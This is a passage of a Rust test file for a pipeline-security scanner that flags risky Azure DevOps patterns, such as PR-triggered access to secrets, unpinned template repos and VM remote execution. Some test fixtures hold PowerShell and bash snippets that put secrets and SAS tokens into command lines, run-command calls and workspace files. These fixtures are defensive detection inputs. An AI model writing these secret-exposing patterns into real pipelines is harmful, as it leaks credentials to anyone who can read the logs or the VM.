        TrustZone::FirstParty,
        vg_meta,
    );
    let deploy = graph.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
    graph.add_edge(deploy, vg_secret, EdgeKind::HasAccessTo);
    let findings = variable_group_in_pr_job(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.severity, Severity::Critical);
    assert_eq!(finding.category, FindingCategory::VariableGroupInPrJob);
    assert!(finding.message.contains("prod-deploy-secrets"));
}
#[test]
fn variable_group_in_pr_job_no_fire_without_pr_trigger() {
    // Same variable-group shape, but no trigger metadata → silent.
    let mut graph = AuthorityGraph::new(source("azure-pipelines.yml"));
    let vg_meta =
        std::collections::HashMap::from([(META_VARIABLE_GROUP.into(), "true".into())]);
    let vg_secret = graph.add_node_with_metadata(
        NodeKind::Secret,
        "prod-deploy-secrets",
        TrustZone::FirstParty,
        vg_meta,
    );
    let deploy = graph.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
    graph.add_edge(deploy, vg_secret, EdgeKind::HasAccessTo);
    assert!(
        variable_group_in_pr_job(&graph).is_empty(),
        "no PR trigger → variable_group_in_pr_job must not fire"
    );
}
#[test]
fn self_hosted_pool_pr_hijack_fires_when_all_three_factors_present() {
    // All three factors: PR trigger + self-hosted pool + self checkout
    // → Critical SelfHostedPoolPrHijack mentioning "self-hosted".
    let mut graph = AuthorityGraph::new(source("azure-pipelines.yml"));
    graph.metadata.insert(META_TRIGGER.into(), "pr".into());
    let pool_meta =
        std::collections::HashMap::from([(META_SELF_HOSTED.into(), "true".into())]);
    graph.add_node_with_metadata(NodeKind::Image, "self-hosted-pool", TrustZone::FirstParty, pool_meta);
    let checkout_meta =
        std::collections::HashMap::from([(META_CHECKOUT_SELF.into(), "true".into())]);
    graph.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, checkout_meta);
    let findings = self_hosted_pool_pr_hijack(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.severity, Severity::Critical);
    assert_eq!(finding.category, FindingCategory::SelfHostedPoolPrHijack);
    assert!(finding.message.contains("self-hosted"));
}
#[test]
fn self_hosted_pool_pr_hijack_no_fire_without_pr_trigger() {
    // Pool + checkout factors present but no PR trigger → silent.
    let mut graph = AuthorityGraph::new(source("azure-pipelines.yml"));
    let pool_meta =
        std::collections::HashMap::from([(META_SELF_HOSTED.into(), "true".into())]);
    graph.add_node_with_metadata(NodeKind::Image, "self-hosted-pool", TrustZone::FirstParty, pool_meta);
    let checkout_meta =
        std::collections::HashMap::from([(META_CHECKOUT_SELF.into(), "true".into())]);
    graph.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, checkout_meta);
    assert!(
        self_hosted_pool_pr_hijack(&graph).is_empty(),
        "no PR trigger → self_hosted_pool_pr_hijack must not fire"
    );
}
#[test]
fn service_connection_scope_mismatch_fires_on_pr_broad_non_oidc() {
    // PR trigger + a broad-scope service connection with no META_OIDC
    // (so not OIDC-federated) → High, naming the connection.
    let mut graph = AuthorityGraph::new(source("azure-pipelines.yml"));
    graph.metadata.insert(META_TRIGGER.into(), "pr".into());
    let connection = graph.add_node_with_metadata(
        NodeKind::Identity,
        "prod-azure-sc",
        TrustZone::FirstParty,
        std::collections::HashMap::from([
            (META_SERVICE_CONNECTION.into(), "true".into()),
            (META_IDENTITY_SCOPE.into(), "broad".into()),
        ]),
    );
    let deploy = graph.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
    graph.add_edge(deploy, connection, EdgeKind::HasAccessTo);
    let findings = service_connection_scope_mismatch(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.severity, Severity::High);
    assert_eq!(finding.category, FindingCategory::ServiceConnectionScopeMismatch);
    assert!(finding.message.contains("prod-azure-sc"));
}
#[test]
fn service_connection_scope_mismatch_no_fire_without_pr_trigger() {
    // Same broad non-OIDC connection but no trigger metadata → silent.
    let mut graph = AuthorityGraph::new(source("azure-pipelines.yml"));
    let connection = graph.add_node_with_metadata(
        NodeKind::Identity,
        "prod-azure-sc",
        TrustZone::FirstParty,
        std::collections::HashMap::from([
            (META_SERVICE_CONNECTION.into(), "true".into()),
            (META_IDENTITY_SCOPE.into(), "broad".into()),
        ]),
    );
    let deploy = graph.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
    graph.add_edge(deploy, connection, EdgeKind::HasAccessTo);
    assert!(
        service_connection_scope_mismatch(&graph).is_empty(),
        "no PR trigger → service_connection_scope_mismatch must not fire"
    );
}
#[test]
fn checkout_self_pr_exposure_fires_on_pr_trigger() {
    // Checking out PR code (checkout: self) under a PR trigger → High.
    let mut graph = AuthorityGraph::new(source("azure-pipelines.yml"));
    graph.metadata.insert(META_TRIGGER.into(), "pr".into());
    let checkout_meta =
        std::collections::HashMap::from([(META_CHECKOUT_SELF.into(), "true".into())]);
    graph.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, checkout_meta);
    let findings = checkout_self_pr_exposure(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.category, FindingCategory::CheckoutSelfPrExposure);
    assert_eq!(finding.severity, Severity::High);
}
#[test]
fn checkout_self_pr_exposure_no_fire_without_pr_trigger() {
    // checkout: self without any PR trigger metadata → silent.
    let mut graph = AuthorityGraph::new(source("azure-pipelines.yml"));
    let checkout_meta =
        std::collections::HashMap::from([(META_CHECKOUT_SELF.into(), "true".into())]);
    graph.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, checkout_meta);
    assert!(
        checkout_self_pr_exposure(&graph).is_empty(),
        "no PR trigger → checkout_self_pr_exposure must not fire"
    );
}
#[test]
fn variable_group_in_pr_job_uses_cellos_remediation() {
    // The variable-group rule must attach a CellosRemediation recommendation.
    let mut graph = AuthorityGraph::new(source("azure-pipelines.yml"));
    graph.metadata.insert(META_TRIGGER.into(), "pr".into());
    let vg_meta =
        std::collections::HashMap::from([(META_VARIABLE_GROUP.into(), "true".into())]);
    let vg_secret = graph.add_node_with_metadata(
        NodeKind::Secret,
        "prod-secret",
        TrustZone::FirstParty,
        vg_meta,
    );
    let deploy = graph.add_node(NodeKind::Step, "deploy step", TrustZone::Untrusted);
    graph.add_edge(deploy, vg_secret, EdgeKind::HasAccessTo);
    let findings = variable_group_in_pr_job(&graph);
    assert!(!findings.is_empty());
    assert!(
        matches!(
            findings[0].recommendation,
            Recommendation::CellosRemediation { .. }
        ),
        "variable_group_in_pr_job must recommend CellosRemediation"
    );
}
#[test]
fn service_connection_scope_mismatch_uses_cellos_remediation() {
    // The scope-mismatch rule must attach a CellosRemediation recommendation.
    let mut graph = AuthorityGraph::new(source("azure-pipelines.yml"));
    graph.metadata.insert(META_TRIGGER.into(), "pr".into());
    // No META_OIDC → treated as not OIDC-federated.
    let connection = graph.add_node_with_metadata(
        NodeKind::Identity,
        "sub-conn",
        TrustZone::FirstParty,
        std::collections::HashMap::from([
            (META_SERVICE_CONNECTION.into(), "true".into()),
            (META_IDENTITY_SCOPE.into(), "broad".into()),
        ]),
    );
    let deploy = graph.add_node(NodeKind::Step, "azure deploy", TrustZone::Untrusted);
    graph.add_edge(deploy, connection, EdgeKind::HasAccessTo);
    let findings = service_connection_scope_mismatch(&graph);
    assert!(!findings.is_empty());
    assert!(
        matches!(
            findings[0].recommendation,
            Recommendation::CellosRemediation { .. }
        ),
        "service_connection_scope_mismatch must recommend CellosRemediation"
    );
}
/// Build a propagation graph with an optional approval-gated middle step:
/// Secret → middle Step (FirstParty) → Artifact → ThirdParty Step.
/// When `gated` is true the middle step carries META_ENV_APPROVAL.
fn build_env_approval_graph(gated: bool) -> AuthorityGraph {
    let mut graph = AuthorityGraph::new(source("azure-pipelines.yml"));
    let key = graph.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
    // Only the gated variant tags the middle step with the approval marker.
    let gate_meta = if gated {
        std::collections::HashMap::from([(META_ENV_APPROVAL.into(), "true".into())])
    } else {
        std::collections::HashMap::new()
    };
    let deploy =
        graph.add_node_with_metadata(NodeKind::Step, "deploy-prod", TrustZone::FirstParty, gate_meta);
    let bundle = graph.add_node(NodeKind::Artifact, "release.tar", TrustZone::FirstParty);
    let uploader = graph.add_node(NodeKind::Step, "third-party/uploader", TrustZone::ThirdParty);
    graph.add_edge(deploy, key, EdgeKind::HasAccessTo);
    graph.add_edge(deploy, bundle, EdgeKind::Produces);
    graph.add_edge(bundle, uploader, EdgeKind::Consumes);
    graph
}
#[test]
fn env_approval_gate_reduces_propagation_severity() {
    // Baseline: no gate → Critical (third-party sink, not SHA-pinned)
    let baseline_finding = authority_propagation(&build_env_approval_graph(false), 4)
        .into_iter()
        .find(|f| f.category == FindingCategory::AuthorityPropagation)
        .expect("baseline must produce an AuthorityPropagation finding");
    assert_eq!(baseline_finding.severity, Severity::Critical);
    assert!(!baseline_finding.message.contains("environment approval gate"));
    // Gated: same shape, middle step tagged → severity drops one step to High
    let gated_finding = authority_propagation(&build_env_approval_graph(true), 4)
        .into_iter()
        .find(|f| f.category == FindingCategory::AuthorityPropagation)
        .expect("gated must produce an AuthorityPropagation finding");
    assert_eq!(
        gated_finding.severity,
        Severity::High,
        "Critical must downgrade to High when path crosses an env-approval gate"
    );
    assert!(
        gated_finding
            .message
            .contains("(mitigated: environment approval gate)"),
        "gated finding must annotate the mitigation in its message"
    );
}
#[test]
fn downgrade_one_step_table() {
    // Severity downgrade lattice: each level drops one step; the two
    // floor levels (Low, Info) map to themselves.
    let expectations = [
        (Severity::Critical, Severity::High),
        (Severity::High, Severity::Medium),
        (Severity::Medium, Severity::Low),
        (Severity::Low, Severity::Low),
        (Severity::Info, Severity::Info),
    ];
    for (input, expected) in expectations {
        assert_eq!(downgrade_one_step(input), expected);
    }
}
// ── template_extends_unpinned_branch ──────────────────────
/// Build a graph whose META_REPOSITORIES carries a single repo descriptor.
/// `git_ref` of `None` encodes the "no `ref:` field" case (default branch).
fn graph_with_repo(
    alias: &str,
    repo_type: &str,
    name: &str,
    git_ref: Option<&str>,
    used: bool,
) -> AuthorityGraph {
    let mut graph = AuthorityGraph::new(source("azure-pipelines.yml"));
    let mut descriptor = serde_json::Map::new();
    // Mandatory string fields of the repo descriptor.
    for (key, value) in [("alias", alias), ("repo_type", repo_type), ("name", name)] {
        descriptor.insert(key.into(), serde_json::Value::String(value.into()));
    }
    // "ref" is only present when the declaration carried an explicit ref.
    if let Some(r) = git_ref {
        descriptor.insert("ref".into(), serde_json::Value::String(r.into()));
    }
    descriptor.insert("used".into(), serde_json::Value::Bool(used));
    let repos = serde_json::Value::Array(vec![serde_json::Value::Object(descriptor)]);
    graph.metadata.insert(
        META_REPOSITORIES.into(),
        serde_json::to_string(&repos).unwrap(),
    );
    graph
}
// ── vm_remote_exec_via_pipeline_secret ──────────────
/// Helper: build a graph with one Step that has the given inline script
/// body and (optionally) a HasAccessTo edge to a Secret named `sas_var`.
fn graph_with_script_step(body: &str, secret_name: Option<&str>) -> AuthorityGraph {
    let mut graph = AuthorityGraph::new(source("ado.yml"));
    let script_meta =
        std::collections::HashMap::from([(META_SCRIPT_BODY.into(), body.into())]);
    let step =
        graph.add_node_with_metadata(NodeKind::Step, "deploy-vm", TrustZone::FirstParty, script_meta);
    if let Some(name) = secret_name {
        let secret = graph.add_node(NodeKind::Secret, name, TrustZone::FirstParty);
        graph.add_edge(step, secret, EdgeKind::HasAccessTo);
    }
    graph
}
// ── secret_to_inline_script_env_export ────────────────────
/// Build a graph with one Step that has access to `secret_name` and
/// stamps `script` as the META_SCRIPT_BODY.
fn build_step_with_script(secret_name: &str, script: &str) -> AuthorityGraph {
    let mut graph = AuthorityGraph::new(source("ado.yml"));
    let secret = graph.add_node(NodeKind::Secret, secret_name, TrustZone::FirstParty);
    let script_meta =
        std::collections::HashMap::from([(META_SCRIPT_BODY.into(), script.into())]);
    let step =
        graph.add_node_with_metadata(NodeKind::Step, "deploy", TrustZone::FirstParty, script_meta);
    graph.add_edge(step, secret, EdgeKind::HasAccessTo);
    graph
}
#[test]
fn template_extends_unpinned_branch_fires_on_missing_ref() {
    // A consumed repo declared without `ref:` floats on its default branch → High.
    let graph = graph_with_repo("template-library", "git", "Template Library/Library", None, true);
    let findings = template_extends_unpinned_branch(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.category, FindingCategory::TemplateExtendsUnpinnedBranch);
    assert_eq!(finding.severity, Severity::High);
    assert!(finding.message.contains("default branch"));
}
#[test]
fn template_extends_unpinned_branch_fires_on_refs_heads_main() {
    // refs/heads/main is a mutable branch ref and must be flagged by name.
    let graph =
        graph_with_repo("templates", "git", "org/templates", Some("refs/heads/main"), true);
    let findings = template_extends_unpinned_branch(&graph);
    assert_eq!(findings.len(), 1);
    assert!(findings[0].message.contains("mutable branch 'main'"));
}
#[test]
fn template_extends_unpinned_branch_skips_tag_pinned() {
    // A refs/tags/... ref is immutable enough to count as pinned.
    let graph = graph_with_repo(
        "templates",
        "github",
        "org/templates",
        Some("refs/tags/v1.0.0"),
        true,
    );
    assert!(
        template_extends_unpinned_branch(&graph).is_empty(),
        "refs/tags/v1.0.0 must be treated as pinned"
    );
}
#[test]
fn template_extends_unpinned_branch_skips_sha_pinned() {
    // A full 40-char hex commit SHA is immutable → never flagged.
    let sha = "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0";
    assert_eq!(sha.len(), 40);
    let graph = graph_with_repo("templates", "git", "org/templates", Some(sha), true);
    assert!(
        template_extends_unpinned_branch(&graph).is_empty(),
        "40-char hex SHA must be treated as pinned"
    );
}
#[test]
fn template_extends_unpinned_branch_skips_unreferenced_repo_with_no_ref() {
    // Spec edge: "repo declared but not referenced anywhere → does not fire
    // (no consumer = no risk)". Applies when the declaration carries no
    // explicit `ref:` field — the entry is purely vestigial in that case.
    let graph = graph_with_repo(
        "templates",
        "git",
        "org/templates",
        None,  // no explicit ref
        false, // and no consumer
    );
    assert!(
        template_extends_unpinned_branch(&graph).is_empty(),
        "repo declared with no ref and no consumer must not fire"
    );
}
#[test]
fn template_extends_unpinned_branch_fires_on_explicit_branch_even_without_in_file_consumer() {
    // An explicit `ref: refs/heads/<branch>` signals intent to consume —
    // the consumer is typically inside an included template file outside
    // the per-file scan boundary (mirrors the msigeurope corpus shape).
    let graph = graph_with_repo(
        "adf_publish",
        "git",
        "org/finance-reporting",
        Some("refs/heads/adf_publish"),
        false, // no in-file consumer
    );
    let findings = template_extends_unpinned_branch(&graph);
    assert_eq!(findings.len(), 1);
    assert!(findings[0].message.contains("mutable branch 'adf_publish'"));
}
#[test]
fn template_extends_unpinned_branch_skips_when_metadata_absent() {
    // A graph that never recorded META_REPOSITORIES has nothing to inspect.
    let graph = AuthorityGraph::new(source("ci.yml"));
    let findings = template_extends_unpinned_branch(&graph);
    assert!(findings.is_empty());
}
#[test]
fn template_extends_unpinned_branch_handles_bare_branch_name() {
    // `ref: main` (no `refs/heads/` prefix) is a valid ADO shorthand for a branch.
    let graph = graph_with_repo(
        "template-library",
        "git",
        "Template Library/Library",
        Some("main"),
        true,
    );
    let findings = template_extends_unpinned_branch(&graph);
    assert_eq!(findings.len(), 1);
    assert!(findings[0].message.contains("mutable branch 'main'"));
}
// ── template_repo_ref_is_feature_branch ───────────────────
#[test]
fn template_repo_ref_is_feature_branch_fires_on_bare_feature_branch() {
    // Mirrors the corpus shape: `ref: feature/maps-network` (no
    // `refs/heads/` prefix) on the Template Library checkout.
    let graph = graph_with_repo(
        "templateLibRepo",
        "git",
        "Template Library/Template Library",
        Some("feature/maps-network"),
        true,
    );
    let findings = template_repo_ref_is_feature_branch(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.category, FindingCategory::TemplateRepoRefIsFeatureBranch);
    assert_eq!(finding.severity, Severity::High);
    assert!(finding.message.contains("feature/maps-network"));
    assert!(finding.message.contains("feature-class"));
}
#[test]
fn template_repo_ref_is_feature_branch_fires_on_refs_heads_feature() {
    // Same attack via the fully-qualified `refs/heads/feature/...` form.
    let graph = graph_with_repo(
        "templates",
        "git",
        "org/templates",
        Some("refs/heads/feature/wip"),
        true,
    );
    let findings = template_repo_ref_is_feature_branch(&graph);
    assert_eq!(findings.len(), 1);
    assert!(findings[0].message.contains("feature/wip"));
}
#[test]
fn template_repo_ref_is_feature_branch_fires_on_develop_branch() {
    // `develop` is not in the trunk set — it's a feature-class branch.
    let graph = graph_with_repo(
        "templates",
        "git",
        "org/templates",
        Some("refs/heads/develop"),
        true,
    );
    assert_eq!(template_repo_ref_is_feature_branch(&graph).len(), 1);
}
#[test]
fn template_repo_ref_is_feature_branch_skips_main_branch() {
    // `template_extends_unpinned_branch` still fires on this — but the
    // feature-branch refinement does not, because main is the trunk.
    let graph = graph_with_repo(
        "templates",
        "git",
        "org/templates",
        Some("refs/heads/main"),
        true,
    );
    assert!(template_repo_ref_is_feature_branch(&graph).is_empty());
    // Sanity: the parent rule still fires on the same input.
    assert_eq!(template_extends_unpinned_branch(&graph).len(), 1);
}
#[test]
fn template_repo_ref_is_feature_branch_skips_master_release_hotfix() {
for ref_value in [
"master",
"refs/heads/master",
"release/v1.4",
"refs/heads/release/2026-q2",
"releases/2026-04",
"hotfix/CVE-2026-0001",
"refs/heads/hotfix/CVE-2026-0002",
] {
let g = graph_with_repo("t", "git", "org/t", Some(ref_value), true);
assert!(
template_repo_ref_is_feature_branch(&g).is_empty(),
"ref {ref_value:?} must not fire as feature-class"
);
}
}
#[test]
fn template_repo_ref_is_feature_branch_skips_pinned_refs() {
// SHA, tag, and refs/heads/<sha> are all pinned — the feature-branch
// rule must not fire on any of them, regardless of the alias name.
let sha = "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0";
for ref_value in [
sha.to_string(),
"refs/tags/v1.4.2".to_string(),
format!("refs/heads/{sha}"),
] {
let g = graph_with_repo("templates", "git", "org/t", Some(&ref_value), true);
assert!(
template_repo_ref_is_feature_branch(&g).is_empty(),
"pinned ref {ref_value:?} must not fire"
);
}
}
#[test]
fn template_repo_ref_is_feature_branch_skips_when_ref_absent() {
// The "no ref:" (default-branch) case is left to
// `template_extends_unpinned_branch`. The feature-branch rule only
// fires on explicit feature-class refs.
let g = graph_with_repo("templates", "git", "org/templates", None, true);
assert!(template_repo_ref_is_feature_branch(&g).is_empty());
}
#[test]
fn template_repo_ref_is_feature_branch_cofires_with_parent_rule() {
// Both rules should fire together on the corpus shape — the parent
// says "not pinned", the refinement says "and it's a feature branch".
let g = graph_with_repo(
"templateLibRepo",
"git",
"Template Library/Template Library",
Some("feature/maps-network"),
true,
);
let parent = template_extends_unpinned_branch(&g);
let refinement = template_repo_ref_is_feature_branch(&g);
assert_eq!(parent.len(), 1, "parent rule must still fire");
assert_eq!(refinement.len(), 1, "refinement must fire alongside");
assert_ne!(parent[0].category, refinement[0].category);
}
#[test]
fn is_feature_class_branch_classification() {
// Trunk-class — must return false.
for b in [
"main",
"MAIN",
"master",
"refs/heads/main",
"release/v1",
"release/",
"release",
"releases/2026",
"hotfix/x",
"hotfix",
"hotfixes/y",
" refs/heads/main ",
] {
assert!(!is_feature_class_branch(b), "{b:?} must be trunk");
}
// Feature-class — must return true.
for b in [
"feature/foo",
"topic/bar",
"dev/wip",
"wip/x",
"develop",
"users/alice/spike",
"personal-branch",
"refs/heads/feature/x",
"main-staging", // not exact main, prefix-only — feature-class
] {
assert!(is_feature_class_branch(b), "{b:?} must be feature-class");
}
// Empty / whitespace.
assert!(!is_feature_class_branch(""));
assert!(!is_feature_class_branch(" "));
}
#[test]
fn template_extends_unpinned_branch_skips_refs_heads_with_sha() {
// ADO accepts `ref: refs/heads/<sha>` to lock onto a commit on a branch.
// The trailing segment is what determines mutability.
let sha = "0123456789abcdef0123456789abcdef01234567";
let g = graph_with_repo(
"templates",
"git",
"org/templates",
Some(&format!("refs/heads/{sha}")),
true,
);
let findings = template_extends_unpinned_branch(&g);
assert!(findings.is_empty());
}
// ── vm_remote_exec_via_pipeline_secret ──────────────
#[test]
fn vm_remote_exec_fires_on_set_azvmextension_with_minted_sas() {
    // SAS minted in-script, then interpolated into the VM
    // CustomScriptExtension command line — the core corpus shape.
    let body = r#"
$sastokenpackages = New-AzStorageContainerSASToken -Container $packagecontainer -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
Set-AzVMExtension -ResourceGroupName $vmRG -VMName $vm.name -Name 'customScript' `
-Publisher 'Microsoft.Compute' -ExtensionType 'CustomScriptExtension' `
-Settings @{ "commandToExecute" = "powershell -File install.ps1 -saskey `"$sastokenpackages`"" }
"#;
    let g = graph_with_script_step(body, None);
    let findings = vm_remote_exec_via_pipeline_secret(&g);
    assert_eq!(findings.len(), 1, "should fire once");
    assert_eq!(
        findings[0].category,
        FindingCategory::VmRemoteExecViaPipelineSecret
    );
    assert_eq!(findings[0].severity, Severity::High);
}
#[test]
fn vm_remote_exec_fires_on_invoke_azvmruncommand_with_pipeline_secret() {
    // Run-command body macro-expands a declared pipeline secret.
    let body = r#"
Invoke-AzVMRunCommand -ResourceGroupName rg -VMName vm `
-CommandId RunPowerShellScript -ScriptString "Add-LocalGroupMember -Member admin -Password $(DOMAIN_JOIN_PASSWORD)"
"#;
    let g = graph_with_script_step(body, Some("DOMAIN_JOIN_PASSWORD"));
    let findings = vm_remote_exec_via_pipeline_secret(&g);
    assert_eq!(findings.len(), 1);
    assert!(findings[0]
        .message
        .contains("interpolating a pipeline secret"));
}
#[test]
fn vm_remote_exec_does_not_fire_without_remote_exec_call() {
    // Has a SAS mint, but no VM remote-exec primitive — should not fire.
    let body = r#"
$sas = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(1)
Write-Host "sas length is $($sas.Length)"
"#;
    let g = graph_with_script_step(body, None);
    let findings = vm_remote_exec_via_pipeline_secret(&g);
    assert!(findings.is_empty());
}
#[test]
fn vm_remote_exec_does_not_fire_when_remote_exec_has_no_secret_or_sas() {
    // Set-AzVMExtension with a static command line, no SAS, no secret —
    // should not fire (no exposed credential).
    let body = r#"
Set-AzVMExtension -ResourceGroupName rg -VMName vm -Name diag `
-Publisher Microsoft.Azure.Diagnostics -ExtensionType IaaSDiagnostics `
-Settings @{ "xmlCfg" = "<wadcfg/>" }
"#;
    let g = graph_with_script_step(body, None);
    let findings = vm_remote_exec_via_pipeline_secret(&g);
    assert!(
        findings.is_empty(),
        "no SAS-mint and no secret interpolation → no finding"
    );
}
#[test]
fn vm_remote_exec_fires_on_az_cli_run_command() {
    // Same remote-exec primitive via the az CLI instead of Az PowerShell.
    let body = r#"
az vm run-command invoke --resource-group rg --name vm `
--command-id RunShellScript --scripts "echo $(DB_PASSWORD) > /tmp/x"
"#;
    let g = graph_with_script_step(body, Some("DB_PASSWORD"));
    let findings = vm_remote_exec_via_pipeline_secret(&g);
    assert_eq!(findings.len(), 1);
    assert!(findings[0].message.contains("az vm run-command"));
}
// ── short_lived_sas_in_command_line ─────────────────
#[test]
fn sas_in_cmdline_fires_on_minted_sas_interpolated_into_command_to_execute() {
    // SAS minted, then interpolated into a commandToExecute string.
    let body = r#"
$sastokenpackages = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
$settings = @{ "commandToExecute" = "powershell install.ps1 -sas `"$sastokenpackages`"" }
"#;
    let g = graph_with_script_step(body, None);
    let findings = short_lived_sas_in_command_line(&g);
    assert_eq!(findings.len(), 1);
    assert_eq!(
        findings[0].category,
        FindingCategory::ShortLivedSasInCommandLine
    );
    assert_eq!(findings[0].severity, Severity::Medium);
    assert!(findings[0].message.contains("sastokenpackages"));
}
#[test]
fn sas_in_cmdline_does_not_fire_when_sas_is_only_uploaded_to_blob() {
    // SAS minted but never put on argv — only used to build a URL.
    let body = r#"
$sas = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(1)
$url = "https://acct.blob.core.windows.net/c/?" + $sas
Invoke-WebRequest -Uri $url -OutFile foo.zip
"#;
    let g = graph_with_script_step(body, None);
    let findings = short_lived_sas_in_command_line(&g);
    assert!(findings.is_empty(), "no command-line sink → no finding");
}
#[test]
fn sas_in_cmdline_does_not_fire_without_sas_mint() {
    // A command-line sink alone, with no SAS mint — nothing to leak.
    let body = r#"
$settings = @{ "commandToExecute" = "powershell -File foo.ps1" }
"#;
    let g = graph_with_script_step(body, None);
    let findings = short_lived_sas_in_command_line(&g);
    assert!(findings.is_empty());
}
#[test]
fn sas_in_cmdline_fires_on_az_cli_generate_sas_with_arguments() {
    // az CLI variant: generate-sas output interpolated into extension settings.
    let body = r#"
sas=$(az storage container generate-sas --name c --account-name acct --permissions r --expiry 2099-01-01 -o tsv)
az vm extension set --vm-name vm --resource-group rg --name CustomScript --publisher Microsoft.Compute \
--settings "{ \"commandToExecute\": \"curl https://acct.blob.core.windows.net/c/foo?$sas\" }"
"#;
    let g = graph_with_script_step(body, None);
    let findings = short_lived_sas_in_command_line(&g);
    // mint + sink in same script → fires (fallback evidence path).
    assert_eq!(findings.len(), 1);
}
#[test]
fn co_fire_on_solarwinds_pattern() {
    // Mirrors the corpus solarwinds shape: SAS minted, embedded in
    // CustomScriptExtension commandToExecute. Both rules must fire.
    let body = r#"
$sastokenpackages = New-AzStorageContainerSASToken -Container $pc -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
Set-AzVMExtension -ResourceGroupName $rg -VMName $vm `
-Publisher 'Microsoft.Compute' -ExtensionType 'CustomScriptExtension' `
-Settings @{ "commandToExecute" = "powershell -File install.ps1 -sas `"$sastokenpackages`"" }
"#;
    let g = graph_with_script_step(body, None);
    let r6 = vm_remote_exec_via_pipeline_secret(&g);
    let r7 = short_lived_sas_in_command_line(&g);
    assert_eq!(r6.len(), 1, "rule 6 must fire on solarwinds shape");
    assert_eq!(r7.len(), 1, "rule 7 must fire on solarwinds shape");
}
#[test]
fn body_interpolates_var_does_not_match_prefix() {
    // `$sas` should not match `$sastokenpackages`.
    assert!(!body_interpolates_var(
        "Write-Host $sastokenpackages",
        "sas"
    ));
    assert!(body_interpolates_var(
        "Write-Host $sastokenpackages",
        "sastokenpackages"
    ));
    assert!(body_interpolates_var("echo $(SECRET)", "SECRET"));
}
#[test]
fn powershell_sas_assignments_extracts_var_names() {
    // Only `$var = New-Az...SASToken` assignments count; `$b` is not a SAS.
    let body = r#"
$a = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r
$b = Get-Date
$sasBlob = New-AzStorageBlobSASToken -Container c -Blob foo -Context $ctx -Permission r
"#;
    let names = powershell_sas_assignments(body);
    assert!(names.iter().any(|n| n.eq_ignore_ascii_case("a")));
    assert!(names.iter().any(|n| n.eq_ignore_ascii_case("sasBlob")));
    assert!(!names.iter().any(|n| n.eq_ignore_ascii_case("b")));
}
#[test]
fn bash_export_of_pipeline_secret_flagged() {
    // Secret macro-expanded into a bash `export` line — env-export sink.
    let g = build_step_with_script(
        "TF_TOKEN",
        "echo init\nexport TF_TOKEN_app_terraform_io=\"$(TF_TOKEN)\"\nterraform init",
    );
    let findings = secret_to_inline_script_env_export(&g);
    assert_eq!(findings.len(), 1);
    assert_eq!(findings[0].severity, Severity::High);
    assert!(findings[0].message.contains("$(TF_TOKEN)"));
}
#[test]
fn powershell_assignment_of_pipeline_secret_flagged() {
    // PowerShell variable assignment is the equivalent sink.
    let g = build_step_with_script(
        "AppContainerDBPassword",
        "$AppContainerDBPassword = \"$(AppContainerDBPassword)\"\n$x = 1",
    );
    let findings = secret_to_inline_script_env_export(&g);
    assert_eq!(findings.len(), 1);
    assert!(findings[0].message.contains("$(AppContainerDBPassword)"));
}
#[test]
fn secret_passed_as_command_argument_not_flagged() {
    // Secret used as a CLI argument, not assigned to a variable. This is
    // covered by the separate META_CLI_FLAG_EXPOSED detection — env_export
    // should NOT also fire here.
    let g = build_step_with_script("TF_TOKEN", "terraform plan -var \"token=$(TF_TOKEN)\"");
    let findings = secret_to_inline_script_env_export(&g);
    assert!(
        findings.is_empty(),
        "command-arg use of $(SECRET) must not trip env-export rule"
    );
}
#[test]
fn step_without_script_body_not_flagged() {
    // Step has access to the secret but carries no inline script at all.
    let mut g = AuthorityGraph::new(source("ado.yml"));
    let secret = g.add_node(NodeKind::Secret, "TF_TOKEN", TrustZone::FirstParty);
    let step = g.add_node(NodeKind::Step, "task", TrustZone::FirstParty);
    g.add_edge(step, secret, EdgeKind::HasAccessTo);
    let findings = secret_to_inline_script_env_export(&g);
    assert!(findings.is_empty());
}
// ── secret_materialised_to_workspace_file ────────────────
#[test]
fn powershell_outfile_of_secret_to_workspace_flagged() {
    // Mirrors Azure_Landing_Zone/userapp-n8nx pattern: secret bound to
    // $var, then $var written via Out-File to $(System.DefaultWorkingDirectory).
    let script = "$AppContainerDBPassword = \"$(AppContainerDBPassword)\"\n\
$TFfile = Get-Content $(System.DefaultWorkingDirectory)/in.tfvars\n\
$TFfile = $TFfile.Replace(\"x\", $AppContainerDBPassword)\n\
$TFfile | Out-File $(System.DefaultWorkingDirectory)/envVars/tffile.tfvars";
    let g = build_step_with_script("AppContainerDBPassword", script);
    let findings = secret_materialised_to_workspace_file(&g);
    assert_eq!(
        findings.len(),
        1,
        "Out-File of bound secret to workspace must fire"
    );
    assert_eq!(findings[0].severity, Severity::High);
}
#[test]
fn bash_redirect_of_secret_to_tfvars_flagged() {
    // bash `>` redirect of a secret into a .tfvars under the workspace.
    let script =
        "echo \"token = \\\"$(TF_TOKEN)\\\"\" > $(Build.SourcesDirectory)/secrets.tfvars";
    let g = build_step_with_script("TF_TOKEN", script);
